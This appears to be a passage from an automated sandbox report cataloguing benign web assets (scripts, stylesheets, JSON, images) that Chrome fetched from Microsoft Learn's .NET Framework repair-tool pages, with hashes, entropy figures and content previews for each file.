                                                                                                                                                                              Preview:<svg width="456" height="456" viewBox="0 0 456 456" fill="none" xmlns="http://www.w3.org/2000/svg">..<rect width="456" height="456" fill="#512BD4"/>..<path d="M81.2738 291.333C78.0496 291.333 75.309 290.259 73.052 288.11C70.795 285.906 69.6665 283.289 69.6665 280.259C69.6665 277.173 70.795 274.529 73.052 272.325C75.309 270.121 78.0496 269.019 81.2738 269.019C84.5518 269.019 87.3193 270.121 89.5763 272.325C91.887 274.529 93.0424 277.173 93.0424 280.259C93.0424 283.289 91.887 285.906 89.5763 288.11C87.3193 290.259 84.5518 291.333 81.2738 291.333Z" fill="white"/>..<path d="M210.167 289.515H189.209L133.994 202.406C132.597 200.202 131.441 197.915 130.528 195.546H130.044C130.474 198.081 130.689 203.508 130.689 211.827V289.515H112.149V171H134.477L187.839 256.043C190.096 259.57 191.547 261.994 192.192 263.316H192.514C191.977 260.176 191.708 254.859 191.708 247.365V171H210.167V289.515Z" fill="white"/>..<path d="M300.449 289.515H235.561V171H297.87V187.695H254.746V221.249H294.485V237.861H254.746V
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):3130
                                                                                                                                                                              Entropy (8bit):4.790069981348324
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:48:YWuGl640ynAqgDJ9OJWuO6Z3Db8VgK/ni47ttbtlSlA37ERw7II77Aj5M1:Nv0ynAhD3CO5t5lNEYIOEjc
                                                                                                                                                                              MD5:EBA6E81304F2F555E1D2EA3126A18A41
                                                                                                                                                                              SHA1:61429C3FE837FD4DD68E7B26678F131F2E00070D
                                                                                                                                                                              SHA-256:F309CCCE17B2B4706E7110F6C76F81761F0A44168D12C358AC4D120776907F81
                                                                                                                                                                              SHA-512:3BE0466794E7BDDC8565758DBF5553E89ED0003271F07695F09283F242BB65C1978ED79A38D5E589A99F68C0130E1E4B52576D7CD655EE272EE104BE0378E72E
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Preview:{"items":[{"children":[{"children":[{"homepage":"/dotnet/api/index","href":"/dotnet/api/","toc_title":"API browser"},{"homepage":"/dotnet/csharp/index","href":"/dotnet/csharp/","toc_title":"C#"},{"homepage":"/dotnet/fsharp/index","href":"/dotnet/fsharp/","toc_title":"F#"},{"homepage":"/dotnet/visual-basic/index","href":"/dotnet/visual-basic/","toc_title":"Visual Basic"},{"homepage":"/dotnet/ai/index","href":"/dotnet/ai/","toc_title":"AI"},{"homepage":"/dotnet/azure/index","href":"/dotnet/azure/","toc_title":"Azure"},{"homepage":"/dotnet/aspire/index","href":"/dotnet/aspire/","toc_title":".NET Aspire"},{"homepage":"/dotnet/orleans/index","href":"/dotnet/orleans/","toc_title":"Orleans"},{"children":[{"homepage":"/dotnet/framework/unmanaged-api/","href":"/dotnet/framework/unmanaged-api/","toc_title":"Unmanaged API reference"}],"homepage":"/dotnet/framework/index","href":"/dotnet/framework/","toc_title":".NET Framework"},{"children":[{"homepage":"/dotnet/architecture/modern-web-apps-azure/
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:PNG image data, 533 x 478, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):15427
                                                                                                                                                                              Entropy (8bit):7.784472070227724
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:384:CKKdvwj3SJMpKKKKKKKKikCyKwqHILyPGQV4ykihKKKKKKKCm:CKKdvMMgKKKKKKKKiqB3yPVXkihKKKKI
                                                                                                                                                                              MD5:3062488F9D119C0D79448BE06ED140D8
                                                                                                                                                                              SHA1:8A148951C894FC9E968D3E46589A2E978267650E
                                                                                                                                                                              SHA-256:C47A383DE6DD60149B37DD24825D42D83CB48BE0ED094E3FC3B228D0A7BB9332
                                                                                                                                                                              SHA-512:00BBA6BCBFBF44B977129594A47F732809DCE7D4E2D22D050338E4EEA91FCC02A9B333C45EEB4C9024DF076CBDA0B46B621BF48309C0D037D19BBEAE0367F5ED
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Preview:.PNG........IHDR.............,#......sRGB.........gAMA......a.....pHYs..........o.d..;.IDATx^..].u.Y..M....B.X...".......@.ZzSys..,H{.Rz!... .......WM.IN..9n..I....g...p<P.0*-....|...X..s...Z.Y{....w..5.._s..x...E.......... ......*............... ......*............{....2. ...`.$h.......)....,T-x.5......,.."..(.A.......>.. ...`..*....4..G.|.....,T-..'. ...`....]........?~.....A...pAP...\.T..........A...pAP...\.T..........A...pAP...\.T..........A...pAP...\.}P../}....TJ...'.O...'?......XH...K..>.b..K/t...o.......T.._.E.....q.$.x..qJ......mo...ww.}.{....W..._...._.^z...........(^x..C..P.../.........U..]../u.....w..{.O.N..o.l........_.^...2.....*....<...iP.W...o......]..+.?}c...t!.....p.=..._x..._yo....?....~u.c?.c1'.....{.^.}.S...5.yMx./.>.lwqq.}.....g..g1wZ..%......h.i[..%ul.&..U.k..";7-.9.6...s..s..0.......}.s..?...c..X...|..........>.x..o.?.?..{........n..o....]?....Ej..yuu5...A.}....5...^...f........s.qJ..SYF.V...'..q.......T..'..z.....
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                              Category:downloaded
                                                                                                                                                                              Size (bytes):464328
                                                                                                                                                                              Entropy (8bit):5.074669864961383
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:6144:XegPryKCerH5dyUJ6Yh6BFPDxZYX04GK7M4:gKCerXyUh
                                                                                                                                                                              MD5:CB0701D474D57F8C8E2F569161CE0349
                                                                                                                                                                              SHA1:4BE2E0C148DED16354E7A91FE721644897C5503C
                                                                                                                                                                              SHA-256:AD52B36EA7D484522BA3382718BD370E6804F7B46AD3BE821D94AF81D66F40EB
                                                                                                                                                                              SHA-512:BB54B08F64F85498D6592C614F844842CD87BA5A9127B1D2B8AFAEC8086DE171642EA2D241708C9D06DEFDDFA04A4189AAD4814AFD15303C6481F23793CD2D3F
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              URL:https://learn.microsoft.com/static/assets/0.4.028726178/styles/site-ltr.css
                                                                                                                                                                              Preview:.CodeMirror{height:300px;color:#000;direction:ltr;font-family:monospace}.CodeMirror-lines{padding:4px 0}.CodeMirror pre.CodeMirror-line,.CodeMirror pre.CodeMirror-line-like{padding:0 4px}.CodeMirror-scrollbar-filler,.CodeMirror-gutter-filler{background-color:#fff}.CodeMirror-gutters{white-space:nowrap;background-color:#f7f7f7;border-right:1px solid #ddd}.CodeMirror-linenumber{min-width:20px;text-align:right;color:#999;white-space:nowrap;padding:0 3px 0 5px}.CodeMirror-guttermarker{color:#000}.CodeMirror-guttermarker-subtle{color:#999}.CodeMirror-cursor{width:0;border-left:1px solid #000;border-right:none}.CodeMirror div.CodeMirror-secondarycursor{border-left:1px solid silver}.cm-fat-cursor .CodeMirror-cursor{width:auto;background:#7e7;border:0!important}.cm-fat-cursor div.CodeMirror-cursors{z-index:1}.cm-fat-cursor .CodeMirror-line::selection,.cm-fat-cursor .CodeMirror-line>span::selection,.cm-fat-cursor .CodeMirror-line>span>span::selection{background:0 0}.cm-fat-cursor{caret-color:#0
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):18477
                                                                                                                                                                              Entropy (8bit):5.147347768532056
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:384:cF3MGvRvqhjNLN1RlX+Vqn3wj2pC33qr3h3x7Z04519u2/8Xx7kuFg/F3Bo3h16z:63MGpvqhj/rlOVqnACpK3o3hhl0OU2/x
                                                                                                                                                                              MD5:9A6B01877BAAC986FE1FBF4CAA95E7C7
                                                                                                                                                                              SHA1:A3227894EACEB2177EEE7CF66A693A9B4C0971FE
                                                                                                                                                                              SHA-256:12051CF7967A2E3F39971EC7F48D1892EB7138F7D1F7E5A3407D63E257EBE7AC
                                                                                                                                                                              SHA-512:5DBDA31E67FE480385283A63F8C2D0CE5E1B2A04A23917F65F0EC6867A9D95C93E4B50807D42D65718EF01588AA523FE791A0A1BD0663BB5DC9BED5E43995AB2
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Preview:{"banners":[{"content":{"text":"You may experience reduced functionality with empty pages and broken links. Development is in progress to improve your experience."},"dismissable":false,"location":"sectional","scope":{"accessLevels":["isolated"],"endDate":"2030-01-01T00:00:00-00:00","paths":["/samples/browse/","/lifecycle/products/","/dotnet/api/","/javascript/api/","/java/api/","/powershell/module/","/python/api/","/rest/api/","/assessments/"],"startDate":"2020-10-01T05:00:00-04:00"},"uid":"development-in-progress-isolated"},{"content":{"link":{"href":"/en-us/answers/questions/1657059/the-subscription-is-not-allowed-to-create-or-updat","title":"View discussion"},"text":"App Service deployment: subscription \u0027xxxxxxxx\u0027 is not allowed to create or update the server farm."},"dismissable":true,"location":"sectional","scope":{"accessLevels":["online"],"endDate":"2024-05-24T07:34:00.000Z","paths":["/answers/tags/436/azure-app-service"],"startDate":"2024-04-22T07:34:00.000Z"},"uid":"
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:ASCII text, with very long lines (65410)
                                                                                                                                                                              Category:downloaded
                                                                                                                                                                              Size (bytes):195712
                                                                                                                                                                              Entropy (8bit):5.430058240656712
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:3072:Wx2fZBMb0y0Xi13tL9+pjXDMe/m7GG3/lHNVlis:Wof3G0NSkNzMeO7z/l3ll
                                                                                                                                                                              MD5:A307DE6214648B16414DC641D7399066
                                                                                                                                                                              SHA1:63980CBC7F3DF8838611519460B570EA50BF5751
                                                                                                                                                                              SHA-256:99B65058137EDB2B63400C273F6F5A064E3B0244152B916FD8C3C7C3818D9D93
                                                                                                                                                                              SHA-512:EE879CC90BF7EF0BE89670D0F0D7F6A85A37324D0C892694D78AE81A28692BE6045A0B59588549533D9AC8E6FC91978778999E37942B530E979D403D95E2D0CD
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              URL:https://js.monitor.azure.com/scripts/c/ms.jsll-4.min.js
                                                                                                                                                                              Preview:/*!. * 1DS JSLL SKU, 4.3.3. * Copyright (c) Microsoft and contributors. All rights reserved.. * (Microsoft Internal Only). */.!function(e,t){var n="undefined";if("object"==typeof exports&&typeof module!=n)t(exports);else if("function"==typeof define&&define.amd)define(["exports"],t);else{var r,i,e=typeof globalThis!=n?globalThis:e||self,a={},o="__ms$mod__",c={},u=c.es5_ms_jsll_4_3_3={},s="4.3.3",l="oneDS4",f=(f=e)[l]=f[l]||{},d=(d=e)[l="oneDS"]=d[l]||{},e=f[o]=f[o]||{},p=e.v=e.v||[],l=d[o]=d[o]||{},g=l.v=l.v||[];for(i in(l.o=l.o||[]).push(c),t(a),a)r="x",f[i]=a[i],p[i]=s,typeof d[i]==n?(r="n",(d[i]=a[i])&&(g[i]=s)):g[i]||(g[i]="---"),(u[r]=u[r]||[]).push(i)}}(this,function(f){"use strict";var d="function",p="object",se="undefined",ie="prototype",g=Object,h=g[ie];function y(e,t){return e||t}var C,Ce=undefined,m=null,b="",T="function",I="object",E="prototype",_="__proto__",S="undefined",x="constructor",N="Symbol",D="_polyfill",A="length",w="name",be="call",k="toString",P=y(Object),O=P[E]
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                              Category:downloaded
                                                                                                                                                                              Size (bytes):18477
                                                                                                                                                                              Entropy (8bit):5.147347768532056
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:384:cF3MGvRvqhjNLN1RlX+Vqn3wj2pC33qr3h3x7Z04519u2/8Xx7kuFg/F3Bo3h16z:63MGpvqhj/rlOVqnACpK3o3hhl0OU2/x
                                                                                                                                                                              MD5:9A6B01877BAAC986FE1FBF4CAA95E7C7
                                                                                                                                                                              SHA1:A3227894EACEB2177EEE7CF66A693A9B4C0971FE
                                                                                                                                                                              SHA-256:12051CF7967A2E3F39971EC7F48D1892EB7138F7D1F7E5A3407D63E257EBE7AC
                                                                                                                                                                              SHA-512:5DBDA31E67FE480385283A63F8C2D0CE5E1B2A04A23917F65F0EC6867A9D95C93E4B50807D42D65718EF01588AA523FE791A0A1BD0663BB5DC9BED5E43995AB2
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              URL:https://learn.microsoft.com/en-us/banners/index.json
                                                                                                                                                                              Preview:{"banners":[{"content":{"text":"You may experience reduced functionality with empty pages and broken links. Development is in progress to improve your experience."},"dismissable":false,"location":"sectional","scope":{"accessLevels":["isolated"],"endDate":"2030-01-01T00:00:00-00:00","paths":["/samples/browse/","/lifecycle/products/","/dotnet/api/","/javascript/api/","/java/api/","/powershell/module/","/python/api/","/rest/api/","/assessments/"],"startDate":"2020-10-01T05:00:00-04:00"},"uid":"development-in-progress-isolated"},{"content":{"link":{"href":"/en-us/answers/questions/1657059/the-subscription-is-not-allowed-to-create-or-updat","title":"View discussion"},"text":"App Service deployment: subscription \u0027xxxxxxxx\u0027 is not allowed to create or update the server farm."},"dismissable":true,"location":"sectional","scope":{"accessLevels":["online"],"endDate":"2024-05-24T07:34:00.000Z","paths":["/answers/tags/436/azure-app-service"],"startDate":"2024-04-22T07:34:00.000Z"},"uid":"
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:PNG image data, 533 x 478, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                              Category:downloaded
                                                                                                                                                                              Size (bytes):15427
                                                                                                                                                                              Entropy (8bit):7.784472070227724
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:384:CKKdvwj3SJMpKKKKKKKKikCyKwqHILyPGQV4ykihKKKKKKKCm:CKKdvMMgKKKKKKKKiqB3yPVXkihKKKKI
                                                                                                                                                                              MD5:3062488F9D119C0D79448BE06ED140D8
                                                                                                                                                                              SHA1:8A148951C894FC9E968D3E46589A2E978267650E
                                                                                                                                                                              SHA-256:C47A383DE6DD60149B37DD24825D42D83CB48BE0ED094E3FC3B228D0A7BB9332
                                                                                                                                                                              SHA-512:00BBA6BCBFBF44B977129594A47F732809DCE7D4E2D22D050338E4EEA91FCC02A9B333C45EEB4C9024DF076CBDA0B46B621BF48309C0D037D19BBEAE0367F5ED
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              URL:https://learn.microsoft.com/en-us/dotnet/framework/install/media/application-not-started/repair-tool-recommended-changes.png
                                                                                                                                                                              Preview:.PNG........IHDR.............,#......sRGB.........gAMA......a.....pHYs..........o.d..;.IDATx^..].u.Y..M....B.X...".......@.ZzSys..,H{.Rz!... .......WM.IN..9n..I....g...p<P.0*-....|...X..s...Z.Y{....w..5.._s..x...E.......... ......*............... ......*............{....2. ...`.$h.......)....,T-x.5......,.."..(.A.......>.. ...`..*....4..G.|.....,T-..'. ...`....]........?~.....A...pAP...\.T..........A...pAP...\.T..........A...pAP...\.T..........A...pAP...\.}P../}....TJ...'.O...'?......XH...K..>.b..K/t...o.......T.._.E.....q.$.x..qJ......mo...ww.}.{....W..._...._.^z...........(^x..C..P.../.........U..]../u.....w..{.O.N..o.l........_.^...2.....*....<...iP.W...o......]..+.?}c...t!.....p.=..._x..._yo....?....~u.c?.c1'.....{.^.}.S...5.yMx./.>.lwqq.}.....g..g1wZ..%......h.i[..%ul.&..U.k..";7-.9.6...s..s..0.......}.s..?...c..X...|..........>.x..o.?.?..{........n..o....]?....Ej..yuu5...A.}....5...^...f........s.qJ..SYF.V...'..q.......T..'..z.....
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:ASCII text, with very long lines (52717), with no line terminators
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):52717
                                                                                                                                                                              Entropy (8bit):5.462668685745912
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:1536:tjspYRrxlhd0fq3agV3IcgPPPI3r7DAQHCloIB3Tj7xHw:tjZLCtxQ
                                                                                                                                                                              MD5:413FCC759CC19821B61B6941808B29B5
                                                                                                                                                                              SHA1:1AD23B8A202043539C20681B1B3E9F3BC5D55133
                                                                                                                                                                              SHA-256:DAF7759FEDD9AF6C4D7E374B0D056547AE7CB245EC24A1C4ACF02932F30DC536
                                                                                                                                                                              SHA-512:E9BF8A74FEF494990AAFD15A0F21E0398DC28B4939C8F9F8AA1F3FFBD18056C8D1AB282B081F5C56F0928C48E30E768F7E347929304B55547F9CA8C1AABD80B8
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Preview:var WcpConsent;!function(){var e={229:function(e){window,e.exports=function(e){var t={};function o(n){if(t[n])return t[n].exports;var r=t[n]={i:n,l:!1,exports:{}};return e[n].call(r.exports,r,r.exports,o),r.l=!0,r.exports}return o.m=e,o.c=t,o.d=function(e,t,n){o.o(e,t)||Object.defineProperty(e,t,{enumerable:!0,get:n})},o.r=function(e){"undefined"!=typeof Symbol&&Symbol.toStringTag&&Object.defineProperty(e,Symbol.toStringTag,{value:"Module"}),Object.defineProperty(e,"__esModule",{value:!0})},o.t=function(e,t){if(1&t&&(e=o(e)),8&t)return e;if(4&t&&"object"==typeof e&&e&&e.__esModule)return e;var n=Object.create(null);if(o.r(n),Object.defineProperty(n,"default",{enumerable:!0,value:e}),2&t&&"string"!=typeof e)for(var r in e)o.d(n,r,function(t){return e[t]}.bind(null,r));return n},o.n=function(e){var t=e&&e.__esModule?function(){return e.default}:function(){return e};return o.d(t,"a",t),t},o.o=function(e,t){return Object.prototype.hasOwnProperty.call(e,t)},o.p="",o(o.s=3)}([function(e,t,o)
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                              Category:downloaded
                                                                                                                                                                              Size (bytes):1432
                                                                                                                                                                              Entropy (8bit):4.986131881931089
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:24:TGAcSRrEV4YUmjiqIWD5bfD9yRSmkYR/stZLKvVqXRRlAfr6VXBAuU:Ti4IV4YUmjiqr9bfskAmZTXGfSXqh
                                                                                                                                                                              MD5:6B8763B76F400DC480450FD69072F215
                                                                                                                                                                              SHA1:6932907906AFCF8EAFA22154D8478106521BC9EE
                                                                                                                                                                              SHA-256:3FB84D357F0C9A66100570EDD62A04D0574C45E8A5209A3E6870FF22AF839DFC
                                                                                                                                                                              SHA-512:8A07EBB806A0BA8EF54B463BD6AF37C77A10C1FA38A57128FD90FCB2C16DF71CE697D4FE65C623E5C6054C5715975831C36861D5574F59DF28836D9BC2B0BC22
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              URL:https://learn.microsoft.com/static/assets/0.4.028726178/global/deprecation.js
                                                                                                                                                                              Preview:// ES5 script for back compat with unsupported browsers..!(function () {..'use strict';..// Keep in sync with environment/browser.ts..var supportedBrowser =...typeof Blob === 'function' &&...typeof PerformanceObserver === 'function' &&...typeof Intl === 'object' &&...typeof MutationObserver === 'function' &&...typeof URLSearchParams === 'function' &&...typeof WebSocket === 'function' &&...typeof IntersectionObserver === 'function' &&...typeof queueMicrotask === 'function' &&...typeof TextEncoder === 'function' &&...typeof TextDecoder === 'function' &&...typeof customElements === 'object' &&...typeof HTMLDetailsElement === 'function' &&...typeof AbortController === 'function' &&...typeof AbortSignal === 'function' &&...'entries' in FormData.prototype &&...'toggleAttribute' in Element.prototype &&...'replaceChildren' in Element.prototype &&...// ES2019...'fromEntries' in Object &&...'flatMap' in Array.prototype &&...'trimEnd' in String.prototype &&...// ES2020...'allSettled' in Promise &
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:ASCII text, with very long lines (52717), with no line terminators
                                                                                                                                                                              Category:downloaded
                                                                                                                                                                              Size (bytes):52717
                                                                                                                                                                              Entropy (8bit):5.462668685745912
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:1536:tjspYRrxlhd0fq3agV3IcgPPPI3r7DAQHCloIB3Tj7xHw:tjZLCtxQ
                                                                                                                                                                              MD5:413FCC759CC19821B61B6941808B29B5
                                                                                                                                                                              SHA1:1AD23B8A202043539C20681B1B3E9F3BC5D55133
                                                                                                                                                                              SHA-256:DAF7759FEDD9AF6C4D7E374B0D056547AE7CB245EC24A1C4ACF02932F30DC536
                                                                                                                                                                              SHA-512:E9BF8A74FEF494990AAFD15A0F21E0398DC28B4939C8F9F8AA1F3FFBD18056C8D1AB282B081F5C56F0928C48E30E768F7E347929304B55547F9CA8C1AABD80B8
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              URL:https://wcpstatic.microsoft.com/mscc/lib/v2/wcp-consent.js
                                                                                                                                                                              Preview:var WcpConsent;!function(){var e={229:function(e){window,e.exports=function(e){var t={};function o(n){if(t[n])return t[n].exports;var r=t[n]={i:n,l:!1,exports:{}};return e[n].call(r.exports,r,r.exports,o),r.l=!0,r.exports}return o.m=e,o.c=t,o.d=function(e,t,n){o.o(e,t)||Object.defineProperty(e,t,{enumerable:!0,get:n})},o.r=function(e){"undefined"!=typeof Symbol&&Symbol.toStringTag&&Object.defineProperty(e,Symbol.toStringTag,{value:"Module"}),Object.defineProperty(e,"__esModule",{value:!0})},o.t=function(e,t){if(1&t&&(e=o(e)),8&t)return e;if(4&t&&"object"==typeof e&&e&&e.__esModule)return e;var n=Object.create(null);if(o.r(n),Object.defineProperty(n,"default",{enumerable:!0,value:e}),2&t&&"string"!=typeof e)for(var r in e)o.d(n,r,function(t){return e[t]}.bind(null,r));return n},o.n=function(e){var t=e&&e.__esModule?function(){return e.default}:function(){return e};return o.d(t,"a",t),t},o.o=function(e,t){return Object.prototype.hasOwnProperty.call(e,t)},o.p="",o(o.s=3)}([function(e,t,o)
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:exported SGML document, ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                              Category:downloaded
                                                                                                                                                                              Size (bytes):1173007
                                                                                                                                                                              Entropy (8bit):5.503893944397598
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:24576:VMga+4IVzOjS1Jho1WXQFjTEr39/jHXzT:VMcVzOjS1Jho1WXQar39/bXzT
                                                                                                                                                                              MD5:2E00D51C98DBB338E81054F240E1DEB2
                                                                                                                                                                              SHA1:D33BAC6B041064AE4330DCC2D958EBE4C28EBE58
                                                                                                                                                                              SHA-256:300480069078B5892D2363A2B65E2DFBBF30FE5C80F83EDBFECF4610FD093862
                                                                                                                                                                              SHA-512:B6268D980CE9CB729C82DBA22F04FD592952B2A1AAB43079CA5330C68A86E72B0D232CE4070DB893A5054EE5C68325C92C9F1A33F868D61EBB35129E74FC7EF9
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              URL:https://learn.microsoft.com/static/third-party/MathJax/3.2.2/tex-mml-chtml.js
                                                                                                                                                                              Preview:(function(){"use strict";var __webpack_modules__={351:function(t,e,r){var n,o=this&&this.__extends||(n=function(t,e){return n=Object.setPrototypeOf||{__proto__:[]}instanceof Array&&function(t,e){t.__proto__=e}||function(t,e){for(var r in e)Object.prototype.hasOwnProperty.call(e,r)&&(t[r]=e[r])},n(t,e)},function(t,e){if("function"!=typeof e&&null!==e)throw new TypeError("Class extends value "+String(e)+" is not a constructor or null");function r(){this.constructor=t}n(t,e),t.prototype=null===e?Object.create(e):(r.prototype=e.prototype,new r)}),i=this&&this.__assign||function(){return i=Object.assign||function(t){for(var e,r=1,n=arguments.length;r<n;r++)for(var o in e=arguments[r])Object.prototype.hasOwnProperty.call(e,o)&&(t[o]=e[o]);return t},i.apply(this,arguments)},s=this&&this.__read||function(t,e){var r="function"==typeof Symbol&&t[Symbol.iterator];if(!r)return t;var n,o,i=r.call(t),s=[];try{for(;(void 0===e||e-- >0)&&!(n=i.next()).done;)s.push(n.value)}catch(t){o={error:t}}finally
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                              Category:downloaded
                                                                                                                                                                              Size (bytes):16
                                                                                                                                                                              Entropy (8bit):3.875
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:3:HMB:k
                                                                                                                                                                              MD5:0B04EA412F8FC88B51398B1CBF38110E
                                                                                                                                                                              SHA1:E073BCC5A03E7BBA2A16CF201A3CED1BE7533FBF
                                                                                                                                                                              SHA-256:7562254FF78FD854F0A8808E75A406F5C6058B57B71514481DAE490FC7B8F4C3
                                                                                                                                                                              SHA-512:6D516068C3F3CBFC1500032E600BFF5542EE30C0EAC11A929EE002C707810BBF614A5586C2673EE959AFDF19C08F6EAEFA18193AD6CEDC839BDF249CF95E8079
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzQSEAkEurwx6c-nJBIFDb_mJfI=?alt=proto
                                                                                                                                                                              Preview:CgkKBw2/5iXyGgA=
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 1301x300, components 3
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):33370
                                                                                                                                                                              Entropy (8bit):7.973675198531228
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:768:ykeIpO37gQNPfG0sxFrlSvg0EliJBectySxPMmPOGTeou78:ykX0DP+TFgg3iJNyyfPO9N78
                                                                                                                                                                              MD5:6E78EE324E008296108BFCDECD77E318
                                                                                                                                                                              SHA1:F7C39EE02C65BCEB2C66AD2D7F45523FEB5AD156
                                                                                                                                                                              SHA-256:EB7A4FF0F8ED4C8A95B2183968B5A59F4058B177F580AE2D2BEF4595B6F6E092
                                                                                                                                                                              SHA-512:BCFFF936BCC46AB4120690CFF3AF93491080E13084EA2BCD8BCE1A2470EA86EB007D695AEF23B73E0B84CB3C7FBF351D025BE47EC5D232AB613A420074F8A448
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Preview:......JFIF..........................................................) .. )/'%'/9339GDG]]}............................................) .. )/'%'/9339GDG]]}......,....!..........6.....................................................................S..d+!XYd..Hb..1..IR.BA0.+!....$C...@I..bU.BH%.1K..A...%...1h.3.,..+0F!Z@....`..%!.o...._]..=......J./Uz.k..._m..}..,s.lV.ED...J...,..b.........Y....u...N..g......A*.$"3!h.~`>.....d+.,.a).Rb.*I...D,."...IXJ..$.A$BU...bA,.`Z.b..,c...KFf.0.B;.f..U.C ..V.X,e.,1t}.....k.:R..b.l....mt.....#..W...iY..d..#.HU$..1...GW%..d]..-.x.:.......&...o.......(h.+.)h..x.?.B....,.D$.0.R.Y.%.."B#E$.$..!..K)0.....X.X.,.1..3BHbAxX.....R.]...1..(..`..VX.2..L.s.......L....]xVU^..Q.v>.I......7I.fJ....+vJ.T0V..z.]....}.J..A...,.~?...+....]...y.|. .H..fFh..l.?.....Yd.IHJ.V...K..F....IS.H...%..K....X.....,C...f..F..$...+..8WdV!]..,.U..p!.A..|Vw.x_I.,$!!...i...2..7.l_...'....}.q..{..z.F........vm/.V.........9..F..dh..;..$..BT.G0O.G.......B.$RJ.Z,,.0%..
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:PNG image data, 533 x 478, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                              Category:downloaded
                                                                                                                                                                              Size (bytes):13339
                                                                                                                                                                              Entropy (8bit):7.683569563478597
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:192:zjSKAj04ndWb6OuzZjk6TsEaJS0/bJur2Gz4Imm3MhE4NfM:zutfW69XTspsG3G0TfhEQM
                                                                                                                                                                              MD5:512625CF8F40021445D74253DC7C28C0
                                                                                                                                                                              SHA1:F6B27CE0F7D4E48E34FDDCA8A96337F07CFFE730
                                                                                                                                                                              SHA-256:1D4DCEE8511D5371FEC911660D6049782E12901C662B409A5C675772E9B87369
                                                                                                                                                                              SHA-512:AE02319D03884D758A86C286B6F593BDFFD067885D56D82EEB8215FDCB41637C7BB9109039E7FBC93AD246D030C368FB285B3161976ED485ABC5A8DF6DF9A38C
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              URL:https://learn.microsoft.com/en-us/dotnet/framework/install/media/application-not-started/repair-tool-changes-complete.png
